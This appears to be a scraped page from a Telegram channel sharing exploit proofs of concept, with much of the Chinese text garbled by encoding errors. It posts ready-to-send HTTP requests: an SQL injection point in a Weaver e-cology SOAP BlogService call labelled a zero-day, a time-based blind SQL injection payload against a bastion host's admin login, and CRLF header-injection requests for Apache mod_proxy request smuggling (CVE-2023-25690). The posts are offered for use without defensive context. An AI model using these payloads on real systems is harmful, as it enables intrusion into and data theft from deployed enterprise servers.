๐Ÿ”ฐ้ป‘็›’-๐‘ฉ๐’๐’‚๐’„๐’Œ ๐‘ฉ๐‘ถ๐‘ฟ-่ต„ๆบๅ…ฌๅผ€๐Ÿ…ฅ๏ผˆๆ•ฐๆฎ็œ‹ๆ–‡ไปถ๏ผ‰
46.3K subscribers
46 photos
8 videos
356 files
73 links
Download Telegram
ecologyๆŸๆŽฅๅฃ sqlๆณจๅ…ฅ 0day poc
POST /services/BlogService HTTP/1.1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.blog.weaver.com.cn">
<soapenv:Header/>
<soapenv:Body>
<web:writeBlogReadFlag>
<web:string>1</web:string>
         <web:string>ๆณจๅ…ฅ็‚น</web:string>
<web:string></web:string>
</web:writeBlogReadFlag>
</soapenv:Body>
</soapenv:Envelope>
๐Ÿ‘6โค2
ไธญ่ฟœ้บ’้บŸๅ กๅž’ๆœบๅญ˜ๅœจSQLๆณจๅ…ฅๆผๆดžๆผpoc

POST /admin.php?controller=admin_commonuser HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 78
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

username=admin' AND (SELECT 6999 FROM (SELECT(SLEEP(5)))ptGN) AND 'AAdm'='AAdm
โค4๐Ÿ‘3
CVE 2023 25690 ๆฆ‚ๅฟต้ชŒ่ฏ - Apache HTTP Server ็‰ˆๆœฌ 2.4.0 - 2.4.55 ไธŠ็š„ mod_proxy ๆ˜“ๅ—ๆ”ปๅ‡ป็š„้…็ฝฎไผšๅฏผ่‡ด HTTP ่ฏทๆฑ‚่ตฐ็งๆผๆดž
โš ๏ธ CVE-2023-25690 ( POC )

- Apache HTTP Server mod_proxy

CLRF Injection
GET /categories/1%20HTTP/1.1%0d%0aFoo:%20baarr HTTP/1.1
Host:

Header Injection
GET /categories/1%20HTTP/1.1%0d%0aHost:%20localhost%0d%0a%0d%0aGET%20/SMUGGLED HTTP/1.1
Host: 1.1.1.1

GitHub URL : https://github.com/dhmosfunk/CVE-2023-25690-POC
โค8๐Ÿ‘3